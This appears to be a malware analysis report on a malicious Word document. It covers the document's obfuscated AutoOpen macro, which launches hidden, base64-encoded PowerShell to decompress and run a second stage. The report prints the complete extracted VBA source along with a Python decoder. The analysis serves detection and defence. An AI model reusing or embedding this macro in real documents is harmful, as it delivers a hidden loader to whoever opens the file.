Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4c0d4c7082bbabf8…

Verdict: MALICIOUS
File type: Office (OLE), 99.2 KB
Authoring application: Microsoft Office Word
Created: 2018-06-11 10:54:00
First seen: 2018-07-04
MD5: 528c1e350d58b4137c5752aa6a86378e
SHA-1: 62d0f01e7893673c0fc7d73a23c2b118708ec7e9
SHA-256: 4c0d4c7082bbabf882d39b24b073efeb97f1bdb362d842d812110251afce9bfe
Risk score: 210

Malware Insights

MITRE ATT&CK
T1204.002 User Execution: Malicious File
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell (the process Shell() launches)
T1027 Obfuscated Files or Information (split string literals, mixed-case binary name, base64-encoded command)

ClamAV identifies the sample as Doc.Downloader.Valyria-6595163-0. The VBA project has an Autoopen() entry point that calls iSrdFmN(), which calls Shell() with a window style of 56639 - 56639 = 0 (vbHide), so the child process has no visible window. The command is assembled from pieces: Chr(GblXXvqvoj + vbKeyP + wnbDAs) evaluates to "P" (vbKeyP is 80 and the other two variables are never assigned, so they are Empty and contribute 0), "owers" is a literal, and the functions Lkjzp, ObKcIzh, lqamIFIjzZ, afhrdvF and YjbEZkY each return a run of concatenated string fragments. Joined, they read PowersHeLL -e <base64>, that is powershell.exe -EncodedCommand. Decoding the base64 as UTF-16LE gives a one-liner that spells iex as $PSHome[21]+$PSHome[34]+'X', base64-decodes a second blob, runs it through System.IO.Compression.DeflateStream in decompress mode, reads the result with a StreamReader and invokes it. The macro therefore contains no URL or download call in clear text: the next stage, which presumably performs the download the ClamAV signature name refers to, sits inside the compressed blob and is not decoded in this report. The remaining statements (CLng(... * CSng(...)), Int(...), bare variable copies) reference undefined variables and either produce junk values or raise errors swallowed by On Error Resume Next; they only pad and randomise the source.
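The decoding described above, as an added example rather than output of the report's own tooling: the script rebuilds the Shell() argument from the string fragments in macros.bas (copied verbatim, one Python line per VBA string variable), decodes the -EncodedCommand payload, and tries the same raw DEFLATE step the stage-1 command applies to its inner blob. The $PSHome path used to resolve the iex trick is an assumption (a stock Windows PowerShell 5 install); extract_stage2 returns None instead of raising if the inner blob does not decompress.

```python
import base64
import re
import zlib
from typing import Optional

# Fragments copied from the extracted macro, grouped by the VBA function that returns them
# and in the order the macro concatenates them. Python's implicit literal concatenation
# stands in for VBA's "+"; the first line of _LKJZP also carries the "HeLL -e " text.
_LKJZP = (
    "HeLL" " -e" " IAAuACgAIAAkA" "FAAcwBIAE8" "AbQBFA" "FsAM" "gAxA"
    "F0AKwAkAFAAcwBI" "AG8AbQBFAFsA" "MwA0AF0AK" "wAnAFg" "AJ" "wA" "pACgAIABuAGUA" "VwAtAE8" "AYgBKAEUAY" "wBUACAA"
    "IABJAE8AL" "gBjAG8ATQ" "BwAFIARQBz" "AFMASQBPAG4AL" "gBEA" "EUAZgBsAEEAVA" "BFAHMAdAByAEU"
    "AQQB" "tACgAI" "AB" "bAFMAW"
    "QBz" "AFQAZQB" "NAC4ASQBPA" "C4Ab" "QBlAG0AbwBS" "AHk"
    "AUwBU" "AHIAZQBhAE0AX" "QAgAFs" "Acw" "BZAHMAVABFAE0" "ALgBjAG8ATgBWA" "GUAcgBUAF0AOgA6" "AGYAUgBvAE0AY"
    "gB" "hAHMARQA2ADQA" "UwBUAFIASQB" "uAGcAKAAg" "AC" "cAVg" "BaAEQ"
    "AdABTAH" "cASgBCAEUATQBi" "AC8AbABm" "ADEAdwBjAE" "UA" "cQA1AFYAeQ"
    "BBAEcASABrAEcAb" "AB2AF" "IAR" "wBKAGMAW" "QB" "rAEY" "AUQBlAHoAdABq" "AGQANwBxAHYAbA" "B5ADcAb" "wAzAHMAcQAvAHU"
)
_OBKCIZH = (
    "AKwB" "0AFoAb" "ABKAGYAQgBtAGE" "AZQAzAHoAR" "ABQAFAASg"
    "BGADQA" "dwBMA" "FUAagBsADAAU" "wBEAGIANQB" "sADgAQgBoAH" "kA" "SgBa"
    "AGIAbwB3AEsAbwA" "xAG" "0AdgBUAHYAR" "gAvADA" "AdgBaAHkAaQBFA" "G8A" "TwBnAEMAawB" "ZADgAaAA3" "AFUA"
    "bwBEAEcAT" "gBIAHAANgBx" "AFAAcABxA" "EUAcw" "BpADQAUgBL" "AHkA" "NgBTAGUASwA" "5AHAAMgBJAGw"
    "AcABKAGgATAB" "zAEU" "AeQBDAEUAcABRA" "GIAbABkAHoA" "agAyADEATAB5ADU" "ATwBvAFA" "AaAB" "TAF" "gAdwBWAFE" "ANgBXAEcAMQ"
    "AwA" "EwAbwAvAGY" "AWQBjAFAAUQA" "xAEcAcwBFAFIAdQ"
    "A1AFcAQ" "wB1AFQARQ" "A0AEIAMwBJAHY" "ATAB4"
)
_LQAMIFIJZZ = (
    "AGUAZAArAGwANQB" "sAFIAMQAwAFoA" "NQAzAEoAZwB2" "AEYAUQ"
    "BMAEoAegBnA" "HQASQ" "BIAGwAYgAzAE4A" "dwBNAE8AdgBa" "AEkATQBHAEU" "AVgBxADIAdA" "BxAFgAZ"
    "QBJAGYA" "aQAvAGMAawBwAGw" "Aaw" "BsAEIAVAB" "iAGkAcQA3AGkAWg" "BSAG4ANAArAHoA" "SAB3AHcA"
    "SAA" "rADIAagB" "vA" "EIAcABxAGI" "ASgB5AGY" "AawB" "vAHYAM" "gBXAGIAd" "gBUAEQAbg" "ByAC8AZQB1ADEA"
    "NgBzAHg" "AMABBAGUA" "dABrAE" "4ANwAxAGYAawBoA" "E0AUQBm" "AGMAYQ" "BpAE"
    "gAMwBkAEIAUwBx" "AE" "MARgBPA" "EoAOABiA"
)
_AFHRDVF = (
    "HUAagBEAFMA" "aQAwAFcAQgBa" "AEQA" "RgArAEkAMABPA" "FEAUQBUAG" "4ATwBEAGQAcg" "BYAD" "UAaQBaAFQAM"
    "gBqAGQAZgBTAHMA" "TwB" "KAE8AUwBQAGgA" "bAA" "2AGEAdgBKADAAQ" "QBvADkA" "YgBUAF" "IAUA" "B5AGUA" "RgBtAE"
    "0AOAAyAFE" "AVwBXAHcATgByAG" "UASA" "BoAC8AOQA5A" "Hg"
    "AbQBvA" "GMA" "cgA4ADM" "AVABMAE" "cAZgBKAHkANAA2A" "DEAQQBhAEo" "AWABHAEkAWQBrA" "CsANgBXADM"
    "ATgBvAGMASgBkA" "GsAcwA5A" "GgAZwAwADAAaAAz" "AFcANgAv" "AEEAUQA9AD0A" "JwAgACkAIAAsA" "FsASQBPAC4AYw" "BvAE0AcABSAGUA" "cwBTAEkA"
    "bwBu" "AC4AYwBvAE0A" "UABSAGUAUw" "BzAEkAbwBOAE" "0ATwBEAGUA" "XQA6ADoA" "ZABFAGM"
)
_YJBEZKY = (
    "ATwBNAFAAU" "gBl" "AHM" "AUwApACAAfAAgA"
    "CUAIAB7AC" "AAbgBlAF" "cALQBPA" "GIASgB" "FA"
    "GMAVAAgACAAS" "QBPAC4AcwBUAFI" "AZQBhAG0Acg" "BFAE" "EAZABFA" "FIAK" "AA" "gAC" "QAXwAgAC" "wAIABbAHQAZQBY"
    "AHQALgBlAE" "4AQwBvAGQAaQBO" "AEcAXQA6ADoAYQB" "zAEMASQBJA" "CAAKQB" "9ACkALgBS"
    "AGUAYQBk" "AFQ" "AbwBlAG4ARAAo" "ACAAKQA="
)


def build_shell_argument() -> str:
    """Rebuild the first argument of Shell(). GblXXvqvoj, wnbDAs, UfiXujVCVjo and rPMIhAAQI
    are never assigned in the macro, so they are Empty: Chr(0 + vbKeyP + 0) is "P" and the
    Empty prefix adds nothing. The second argument, 56639 - 56639, is 0 (vbHide)."""
    return chr(0x50) + "owers" + _LKJZP + _OBKCIZH + _LQAMIFIJZZ + _AFHRDVF + _YJBEZKY


def decode_encoded_command(shell_arg: str) -> str:
    """Split '<binary> -e <b64>' and decode the UTF-16LE text -EncodedCommand expects."""
    binary, flag, payload = shell_arg.split(" ", 2)
    if binary.lower() != "powershell" or flag.lower() != "-e":
        raise ValueError("not a powershell -EncodedCommand invocation")
    return base64.b64decode(payload, validate=True).decode("utf-16-le")


def resolve_pshome_trick(pshome: str = r"C:\Windows\System32\WindowsPowerShell\v1.0") -> str:
    """$PSHome[21]+$PSHome[34]+'X' spells iex without the literal token. The default path is
    an assumption (Windows PowerShell 5 on a stock install) used only for illustration."""
    return pshome[21] + pshome[34] + "X"


def extract_stage2(stage1: str) -> Optional[bytes]:
    """Stage 1 feeds a base64 blob through DeflateStream(Decompress), i.e. raw DEFLATE
    (wbits=-15). Return the decompressed script, or None if the blob does not decompress."""
    m = re.search(r"fRoMbasE64STRIng\(\s*'([A-Za-z0-9+/=]+)'", stage1, re.IGNORECASE)
    if not m:
        return None
    try:
        return zlib.decompress(base64.b64decode(m.group(1)), -15)
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    stage1 = decode_encoded_command(build_shell_argument())
    print(stage1)
    print("call operator target:", resolve_pshome_trick())
    stage2 = extract_stage2(stage1)
    print(stage2.decode("ascii", "replace") if stage2 else "<stage 2 did not decompress>")
```

The printed stage-1 text is exactly what Shell() hands to powershell.exe; every token is case-mangled and the only literal that a string scanner would flag, iex, is never present, which is why hunting for this family should key on the DeflateStream/FromBase64String/ReadToEnd combination and on powershell.exe spawned from WINWORD.EXE with -e, not on a command string. Treat the decompressed stage 2 as a new sample and decode it the same way rather than executing it.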

Heuristics (7)

  • ClamAV detection [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Matched line in script (with one line of context on each side):
      cizzz = GdEtdB
      iSrdFmN = rPMIhAAQI + Shell(UfiXujVCVjo + Chr(GblXXvqvoj + vbKeyP + wnbDAs) + "owers" + Lkjzp + ObKcIzh + lqamIFIjzZ + afhrdvF + YjbEZkY, 56639 - 56639)
      ivGPcv = CLng(88108 * CSng(kLHILK + ChrB(JzvDj + CInt(38708))))
    The second argument, 56639 - 56639, is 0 (vbHide), so the child process runs without a window. The first argument resolves to "PowersHeLL -e <base64>": Chr(vbKeyP) is "P", and the five named functions return the base64 fragments.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This rule exists for p-code-only documents and for documents whose source cannot be extracted, where no readable source is available; here it corroborates the source-level findings above.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script (with one line of context on each side):
      End Function
      Sub Autoopen()
      On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule is written for the case where no modern VBA project was recovered and no stronger macro-virus family marker is present; it is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this sample the VBA project was recovered (macros.bas below), so the finding overlaps OLE_VBA_AUTOOPEN and adds no separate execution path.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label records which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace identifier, present in any Office file that embeds drawing markup. It is not a network indicator and should not be blocked or hunted on.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   10378 bytes
SHA-256: 243bca5e94a34c5a12dba9c0c4ee0f5b069c45ac609255b968e13c26d5e7b186

Extracted script (the preview is capped at the first 1,000 lines; this 300-line module fits under the cap and appears in full):
Attribute VB_Name = "HwdfRtu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iSrdFmN()
On Error Resume Next
iKAddk = CLng(59584 * CSng(TXRMdt + ChrB(CIaam + CInt(38484))))
YXojN = Int(cifAU)
rJoLbq = Azjcsl
uWzpXr = Sldoz
OzpsQ = lBOOwz
vTOouv = TVGjqd
WZXKXd = CLng(38560 * CSng(AIrLAz + ChrB(jHBpmw + CInt(3785))))
witCD = Int(tICnPP)
qEZVQT = Gzjvv
pzfAqj = Wabdb
iHzpY = kQpDcT
cizzz = GdEtdB
iSrdFmN = rPMIhAAQI + Shell(UfiXujVCVjo + Chr(GblXXvqvoj + vbKeyP + wnbDAs) + "owers" + Lkjzp + ObKcIzh + lqamIFIjzZ + afhrdvF + YjbEZkY, 56639 - 56639)
ivGPcv = CLng(88108 * CSng(kLHILK + ChrB(JzvDj + CInt(38708))))
lYbcj = Int(niNVn)
BpKabh = WsXprn
vTEzaV = fJhozO
MGzlV = IWzZUW
zLOjj = tZUZPv
End Function
Sub Autoopen()
On Error Resume Next
wWfdl = CLng(54076 * CSng(BKlZE + ChrB(EiZTf + CInt(56694))))
OfTvw = Int(KVwrh)
pCkmqW = sDEmao
NkPAAt = rDTCji
RzCSDr = TTsiz
lAJstH = qZGwr
iSrdFmN
vwzRjH = CLng(83590 * CSng(aGCTX + ChrB(PuQWSC + CInt(1541))))
qtbJc = Int(qrqEb)
vQUCJ = FmKtHY
JDwJj = onuHFq
fjPiP = sIBzaO
rwOqw = CmSHui
End Sub


Attribute VB_Name = "YmbBIOMj"
Function Lkjzp()
On Error Resume Next
VakwK = CLng(40276 * CSng(MqiAKL + ChrB(sTKmo + CInt(94205))))
qwDsLL = Int(CXabLq)
hubbB = thmRs
qLVaR = FBfch
zJAKS = YzUPK
jLmpG = LlzHU
XDjWz = "HeLL" + " -e" + " IAAuACgAIAAkA" + "FAAcwBIAE8" + "AbQBFA" + "FsAM" + "gAxA"
jzIRF = CLng(78941 * CSng(FMUcsH + ChrB(Pittja + CInt(2159))))
rGXPvW = Int(wHroi)
VzHtfo = LOjui
shsGY = RkGCup
EoQNkE = Eufmz
mvkcX = hXijEB
EwlZRmsZf = "F0AKwAkAFAAcwBI" + "AG8AbQBFAFsA" + "MwA0AF0AK" + "wAnAFg" + "AJ" + "wA" + "pACgAIABuAGUA" + "VwAtAE8" + "AYgBKAEUAY" + "wBUACAA"
uRtOz = CLng(24185 * CSng(ljRvB + ChrB(pJTwBF + CInt(12892))))
HVzdi = Int(IWaEM)
RKHLf = ZvSCip
YnXDfh = uwmvtl
vvOJM = phfCHT
jLCEr = BGdkT
FRjswbK = "IABJAE8AL" + "gBjAG8ATQ" + "BwAFIARQBz" + "AFMASQBPAG4AL" + "gBEA" + "EUAZgBsAEEAVA" + "BFAHMAdAByAEU"
XORSXM = CLng(35014 * CSng(PizDtS + ChrB(mrIVw + CInt(23210))))
RjwiE = Int(kMRLvO)
TYPHpp = FCLwK
COPVO = iKwhW
HiJCNo = fdnOb
fHmIP = zXfjV
ScCTVbLci = "AQQB" + "tACgAI" + "AB" + "bAFMAW"
vzYfiX = CLng(81195 * CSng(SiGQCo + ChrB(qfuPA + CInt(75557))))
iPwCj = Int(YRcCn)
Rqjzz = YihzA
FbAGr = RVKaOJ
cqjUBG = czXjH
vzbEnk = bwFJS
BqlfuzrYKT = "QBz" + "AFQAZQB" + "NAC4ASQBPA" + "C4Ab" + "QBlAG0AbwBS" + "AHk"
rkSvr = CLng(53767 * CSng(QWZsO + ChrB(rvsIDT + CInt(97138))))
pStFn = Int(uHjkWB)
PUKBjE = PYZjpH
TioCpT = BRZpD
fJqpVM = cbiGX
QwQtJ = jlaYr
FWqZWnDYajI = "AUwBU" + "AHIAZQBhAE0AX" + "QAgAFs" + "Acw" + "BZAHMAVABFAE0" + "ALgBjAG8ATgBWA" + "GUAcgBUAF0AOgA6" + "AGYAUgBvAE0AY"
hhNNCk = CLng(22755 * CSng(GCFikO + ChrB(CQrAhi + CInt(50154))))
RlYPa = Int(MEkwG)
iqPZzu = IOriJu
dVjYKE = iwbdV
EuzVjd = wLARCm
RpaDPV = uqVLoC
QOCqVrR = "gB" + "hAHMARQA2ADQA" + "UwBUAFIASQB" + "uAGcAKAAg" + "AC" + "cAVg" + "BaAEQ"
AunwcJ = CLng(82565 * CSng(QVwfT + ChrB(RUSVYV + CInt(80065))))
VYNAzK = Int(cJvau)
QNUacr = YEEjB
cWCqPh = LZPicL
JoMDFZ = BHzvvd
QRUizw = hZTftD
QjMJnT = "AdABTAH" + "cASgBCAEUATQBi" + "AC8AbABm" + "ADEAdwBjAE" + "UA" + "cQA1AFYAeQ"
rzlwRL = CLng(89332 * CSng(rAibIb + ChrB(FuUDF + CInt(89117))))
vEdNw = Int(PtXLWE)
JLwdS = hZTzXp
RTYLp = sjChVE
RUwdS = ERGuw
lONibF = XsKvV
UQFUCMj = "BBAEcASABrAEcAb" + "AB2AF" + "IAR" + "wBKAGMAW" + "QB" + "rAEY" + "AUQBlAHoAdABq" + "AGQANwBxAHYAbA" + "B5ADcAb" + "wAzAHMAcQAvAHU"
Lkjzp = XDjWz + EwlZRmsZf + FRjswbK + ScCTVbLci + BqlfuzrYKT + FWqZWnDYajI + QOCqVrR + QjMJnT + UQFUCMj
End Function
Function ObKcIzh()
On Error Resume Next
WYLZG = CLng(58237 * CSng(ZGZMbq + ChrB(SkoLZZ + CInt(40864))))
jiBab = Int(jTGYc)
wjssz = XQfpA
lYmnD = WvrSoj
fCLtm = owZkl
wMJCEY = ivpDcs
OuhpjjIp = "AKwB" + "0AFoAb" + "ABKAGYAQgBtAGE" + "AZQAzAHoAR" + "ABQAFAASg"
HChZi = CLng(85154 * CSng(UTNMW + ChrB(XLHLnB + CInt(91794))))
nMsmu = Int(CcqwiB)
KmRzG = fcswqi
XSndPb = JUponk
JrcOdV = MZqLh
QiuQC = PWjpM
HhQGdALtzi = "BGADQA" + "dwBMA" + "FUAagBsADAAU" + "wBEAGIANQB" + "sADgAQgBoAH" + "kA" + "SgBa"
GENqwd = CLng(23347 * CSng(vVkPh + ChrB(MHLtz + CInt(34512))))
ThiZZl = Int(UbaCQf)
RJWcM = KMutii
qHLpru = mXiQX
cBTviz = pvzoQ
SXGmlv = vsNQkK
ofiIj = "AGIAbwB3AEsAbwA" + "xAG" + "0AdgBUAHYAR" + "gAvADA" + "AdgBaAHkAaQBFA" + "G8A" + "TwBnAEMAawB" + "ZADgAaAA3" + "AFUA"
fkubF = CLng(10293 * CSng(XJtwK + ChrB(hAvJWZ + CInt(13553))))
cjkwUh = Int(joDKXd)
EAWjL = uONoa
JuzDt = DtCEK
kXYoVq = nBKwun
OrhOSv = EYBlk
LWdVmaYl = "bwBEAEcAT" + "gBIAHAANgBx" + "AFAAcABxA" + "EUAcw" + "BpADQAUgBL" + "AHkA" + "NgBTAGUASwA" + "5AHAAMgBJAGw"
zTjUA = CLng(81331 * CSng(wnqGtX + ChrB(nOwwC + CInt(31734))))
zMLnl = Int(IjzXC)
jpTRpv = vpaAb
vvipZ = jTDBH
jPbiR = SDIrLU
JDzUQW = kSpSZ
ZdUdM = "AcABKAGgATAB" + "zAEU" + "AeQBDAEUAcABRA" + "GIAbABkAHoA" + "agAyADEATAB5ADU" + "ATwBvAFA" + "AaAB" + "TAF" + "gAdwBWAFE" + "ANgBXAEcAMQ"
ZUSRcn = CLng(22181 * CSng(JjcNXn + ChrB(XMEkOs + CInt(31266))))
mzmfwn = Int(ZIJaN)
lqOXID = WUHtj
MFliKw = VjSpH
FvGUD = ZjmVqM
pQdRr = wSaHna
PQIzZXiBA = "AwA" + "EwAbwAvAGY" + "AWQBjAFAAUQA" + "xAEcAcwBFAFIAdQ"
cEdEYY = CLng(31190 * CSng(zEPADw + ChrB(takvV + CInt(9761))))
tsPaw = Int(wfnSt)
TUGhz = wMrLN
owmYA = sFtTK
pwbFwS = wHwdo
tndYsR = iwmAYX
vLIvK = "A1AFcAQ" + "wB1AFQARQ" + "A0AEIAMwBJAHY" + "ATAB4"
ObKcIzh = OuhpjjIp + HhQGdALtzi + ofiIj + LWdVmaYl + ZdUdM + PQIzZXiBA + vLIvK
End Function
Function lqamIFIjzZ()
On Error Resume Next
QanMAK = CLng(41337 * CSng(wprPZv + ChrB(JpTzl + CInt(12509))))
OhACcG = Int(MbjYnA)
TldiR = onjcs
Oowjam = fLGLz
PAmOKq = utqEqS
EvbAX = qrCQu
PwSNC = "AGUAZAArAGwANQB" + "sAFIAMQAwAFoA" + "NQAzAEoAZwB2" + "AEYAUQ"
mOULM = CLng(50781 * CSng(zCBCZV + ChrB(GrVwsq + CInt(14922))))
TkkFn = Int(qXzVTE)
Waidd = VRDtB
mDwWEX = wUvka
msGiD = FRhjRm
OfmBQ = ibBjsB
IYYjtQKNVYS = "BMAEoAegBnA" + "HQASQ" + "BIAGwAYgAzAE4A" + "dwBNAE8AdgBa" + "AEkATQBHAEU" + "AVgBxADIAdA" + "BxAFgAZ"
zQGkbq = CLng(14647 * CSng(qSOmz + ChrB(wNEUj + CInt(69013))))
JXLSit = Int(flINdK)
pKzHbf = XNXORi
NzOLRJ = suRzwP
FKAIod = DHNFE
lKoENP = RotCM
GdHCpqZEh = "QBJAGYA" + "aQAvAGMAawBwAGw" + "Aaw" + "BsAEIAVAB" + "iAGkAcQA3AGkAWg" + "BSAG4ANAArAHoA" + "SAB3AHcA"
uwPfJ = CLng(58432 * CSng(HSCWF + ChrB(AiKpBF + CInt(23892))))
ChGNk = Int(IYRQww)
jKnbDb = dTHRwk
bHwsw = crPJSZ
GjAmXJ = RUXOwi
vjZoP = ShRSXC
qzsusliniBN = "SAA" + "rADIAagB" + "vA" + "EIAcABxAGI" + "ASgB5AGY" + "AawB" + "vAHYAM" + "gBXAGIAd" + "gBUAEQAbg" + "ByAC8AZQB1ADEA"
KrvdId = CLng(58554 * CSng(tSVtow + ChrB(HjktRc + CInt(64338))))
pUDai = Int(RiOVM)
ZYtFUA = BREuaD
Zhiil = djFJF
AIckG = cSYjq
ZRnjql = cXJzk
ZjEujrolrp = "NgBzAHg" + "AMABBAGUA" + "dABrAE" + "4ANwAxAGYAawBoA" + "E0AUQBm" + "AGMAYQ" + "BpAE"
kksApT = CLng(70134 * CSng(RzfZj + ChrB(Wwkzqr + CInt(8578))))
TjztT = Int(cfqJrl)
ojSiP = iHRHG
oDimM = sufQM
wzBXl = Whvah
ROala = CYqjff
NYDratzaM = "gAMwBkAEIAUwBx" + "AE" + "MARgBPA" + "EoAOABiA"
lqamIFIjzZ = PwSNC + IYYjtQKNVYS + GdHCpqZEh + qzsusliniBN + ZjEujrolrp + NYDratzaM
End Function
Function afhrdvF()
On Error Resume Next
tizzqq = CLng(46071 * CSng(PmQEG + ChrB(IlZON + CInt(42818))))
VziGU = Int(OoLMTW)
siWiF = JsCcJh
atnRV = IiXhR
VHJiDZ = ihdiOq
cMXTU = ZBIUB
RpAmNvHFFDp = "HUAagBEAFMA" + "aQAwAFcAQgBa" + "AEQA" + "RgArAEkAMABPA" + "FEAUQBUAG" + "4ATwBEAGQAcg" + "BYAD" + "UAaQBaAFQAM"
rBNqUw = CLng(10238 * CSng(jcAJwD + ChrB(zlwPY + CInt(52099))))
pwLEM = Int(SUzohK)
wVrJhJ = ZAMNU
MaPLF = SfMQiP
MXOdLc = WQduni
amojw = vjrEnj
PiJmiOR = "gBqAGQAZgBTAHMA" + "TwB" + "KAE8AUwBQAGgA" + "bAA" + "2AGEAdgBKADAAQ" + "QBvADkA" + "YgBUAF" + "IAUA" + "B5AGUA" + "RgBtAE"
rCkEM = CLng(88291 * CSng(wcKWBk + ChrB(vwwVYX + CInt(25631))))
sXjjfo = Int(fKpcYw)
jZitk = zcSiN
AjvjP = rwJMX
OIPzAh = MjaQW
fmuuQF = Scnzkb
PCzKpmaZJ = "0AOAAyAFE" + "AVwBXAHcATgByAG" + "UASA" + "BoAC8AOQA5A" + "Hg"
PjwKT = CLng(4557 * CSng(ibDAc + ChrB(JBTZTY + CInt(92002))))
ZwDtHZ = Int(lVSMY)
JflQz = lALru
UoQJOi = fpqku
LdotG = nDdAVh
VDKkO = JFnlw
DFNwqUHRk = "AbQBvA" + "GMA" + "cgA4ADM" + "AVABMAE" + "cAZgBKAHkANAA2A" + "DEAQQBhAEo" + "AWABHAEkAWQBrA" + "CsANgBXADM"
GoAtSS = CLng(91228 * CSng(zmrwGE + ChrB(Gkrnu + CInt(54082))))
IIUFb = Int(kLXrrR)
wnJKh = pKjMNd
zDUvz = ABjrY
qQGnO = EpEKSb
FUmvYw = cRfhr
OQvcwbhF = "ATgBvAGMASgBkA" + "GsAcwA5A" + "GgAZwAwADAAaAAz" + "AFcANgAv" + "AEEAUQA9AD0A" + "JwAgACkAIAAsA" + "FsASQBPAC4AYw" + "BvAE0AcABSAGUA" + "cwBTAEkA"
tqQwQw = CLng(70421 * CSng(qJjWVM + ChrB(nFoks + CInt(29789))))
hNGHvS = Int(ZlZvmF)
YFuWq = OKCYDk
oMqwwM = ICsJB
NRXJb = GuOzuN
hiWLh = KUwNv
LvzPSdQj = "bwBu" + "AC4AYwBvAE0A" + "UABSAGUAUw" + "BzAEkAbwBOAE" + "0ATwBEAGUA" + "XQA6ADoA" + "ZABFAGM"
afhrdvF = RpAmNvHFFDp + PiJmiOR + PCzKpmaZJ + DFNwqUHRk + OQvcwbhF + LvzPSdQj
End Function
Function YjbEZkY()
On Error Resume Next
waEFVN = CLng(71388 * CSng(YUwns + ChrB(VdDaMv + CInt(67450))))
fXmrLF = Int(zREchi)
CosmJ = dMhjSk
hRVAzt = vjTdCf
aCrKLS = aOhZm
TSpDZa = IjvDd
cWcvZrzchDr = "ATwBNAFAAU" + "gBl" + "AHM" + "AUwApACAAfAAgA"
fNVVOk = CLng(57648 * CSng(DJpZG + ChrB(VGCob + CInt(24494))))
jcrPE = Int(IWtHnj)
mzFtT = IdQIAi
HBBdH = RlwkiF
JVqJC = skfWB
VmEYQ = rllTG
BCtFooUCO = "CUAIAB7AC" + "AAbgBlAF" + "cALQBPA" + "GIASgB" + "FA"
PzLPk = CLng(76696 * CSng(bnIfm + ChrB(GFwlib + CInt(60042))))
UmpMN = Int(PmTZpO)
tCqdz = HaWMHR
JOtACs = UvNVCX
zoTjq = SNCHH
kYawZi = bZAtTX
qCMClAdbuo = "GMAVAAgACAAS" + "QBPAC4AcwBUAFI" + "AZQBhAG0Acg" + "BFAE" + "EAZABFA" + "FIAK" + "AA" + "gAC" + "QAXwAgAC" + "wAIABbAHQAZQBY"
nAzpUa = CLng(53338 * CSng(HmCdRt + ChrB(wMlsS + CInt(15162))))
uzonH = Int(fwuAMt)
RPNnjH = QowwQB
coIaE = jGABjT
GIrBQY = CjwzL
KnFBr = FoCKl
bfnCNhZuWX = "AHQALgBlAE" + "4AQwBvAGQAaQBO" + "AEcAXQA6ADoAYQB" + "zAEMASQBJA" + "CAAKQB" + "9ACkALgBS"
IDBKP = CLng(23696 * CSng(NcqHw + ChrB(fstFvp + CInt(20760))))
tiwAw = Int(KNqDw)
cIUHs = mrwiU
JHMdMj = UaKPZ
JQCwz = mIpSWY
NiDTQK = Qrrzj
QIZZIiOjAu = "AGUAYQBk" + "AFQ" + "AbwBlAG4ARAAo" + "ACAAKQA="
YjbEZkY = cWcvZrzchDr + BCtFooUCO + qCMClAdbuo + bfnCNhZuWX + QIZZIiOjAu
End Function